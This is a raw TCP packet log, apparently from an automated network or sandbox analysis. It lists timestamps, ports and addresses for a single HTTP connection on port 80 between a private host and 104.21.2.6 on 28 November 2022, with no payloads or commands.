Nov 28, 2022 16:37:03.853305101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853315115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853326082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853337049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853348017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853358984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853369951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853379965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853390932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853456974 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.853456974 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.853619099 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.853648901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853662014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853672981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853683949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853694916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853704929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853717089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853796005 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.853885889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853899002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853909969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853920937 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853931904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853934050 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.853948116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853959084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853969097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853980064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.853991985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854002953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854012966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854023933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854033947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854044914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854055882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854065895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854077101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854087114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854098082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854109049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854119062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854154110 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.854154110 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.854162931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.854321957 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.854491949 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.856790066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.856957912 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.857088089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.857101917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.857115984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.857127905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.857137918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.857148886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.857158899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.857306957 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.857306957 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.863392115 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.864386082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864531994 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.864578009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864592075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864605904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864649057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864660025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864670992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864681959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864706993 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864717960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864728928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864739895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864751101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864762068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864764929 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.864778042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864789009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864799023 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864809990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864814043 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.864825964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864836931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.864999056 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.864999056 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.865026951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.865040064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.865051031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.865061045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.865072012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.865081072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.865355015 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.865848064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866072893 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.866103888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866117001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866130114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866141081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866152048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866162062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866173029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866183043 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866219044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866231918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866260052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866285086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866298914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866309881 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866319895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866328955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.866384983 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.866384983 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.866511106 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.872267962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.872426987 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.872607946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.872632980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.872828007 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.872828007 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.882829905 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.891808033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891870975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891884089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891896009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891907930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891927004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891938925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891949892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891962051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891976118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891988039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.891999006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892010927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892023087 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892034054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892045975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892056942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892164946 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.892261982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892272949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892283916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892294884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892308950 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.892308950 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.892318964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892332077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892362118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892373085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892396927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892410040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892421007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892431974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892441988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892452955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892477989 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.892568111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892579079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892590046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892600060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892611027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892621994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892632008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892642975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892647028 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.892658949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892669916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892680883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892690897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892702103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892713070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892723083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892734051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892745018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892755032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892765999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892826080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.892988920 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.893115997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.893126965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.893137932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.893148899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.893157005 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.893162966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.893522024 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.898567915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.898658037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.898669958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.898680925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.898694038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.898746967 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.898767948 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.898886919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.898941040 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.898941040 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.898962975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.898973942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.899096012 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.899240971 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.930128098 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.933918953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934066057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934068918 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.934084892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934096098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934108019 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934119940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934130907 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934142113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934153080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934164047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934190989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934201002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934211969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934223890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934233904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934245110 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934256077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934273958 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934281111 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.934281111 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.934292078 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934300900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.934540987 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.934752941 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.947115898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947249889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947263956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947278976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947289944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947300911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947310925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947314978 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.947329044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947339058 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947350025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947360992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947371960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947382927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947392941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947403908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947415113 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947426081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947437048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947447062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947458029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947530985 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.947530985 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.947679996 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.947710037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947722912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947732925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947743893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947755098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947763920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947774887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947786093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947796106 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947807074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947817087 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947827101 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.947827101 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.947837114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947848082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947858095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947869062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947879076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947890043 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947901011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947911024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947921991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947947979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947958946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947969913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947981119 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947992086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.947997093 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.947997093 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.948010921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948021889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948031902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948043108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948054075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948064089 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948072910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948203087 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.948203087 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.948374987 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.948535919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948553085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948565006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948575020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948585987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948720932 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.948795080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948807001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948817015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948827982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948838949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948849916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948859930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948870897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948880911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948892117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948903084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948913097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948924065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948935032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948945045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948950052 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.948961973 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948972940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948982954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.948993921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949004889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949014902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949026108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949037075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949074030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949084997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949120045 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.949120045 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.949120045 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.949290991 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.949356079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949368000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949378967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949388981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949495077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949506044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949517965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949528933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949537992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.949847937 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.964982033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965074062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965087891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965197086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965342045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:03.965406895 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:03.965406895 CET	49830	80	192.168.11.20	104.21.2.6
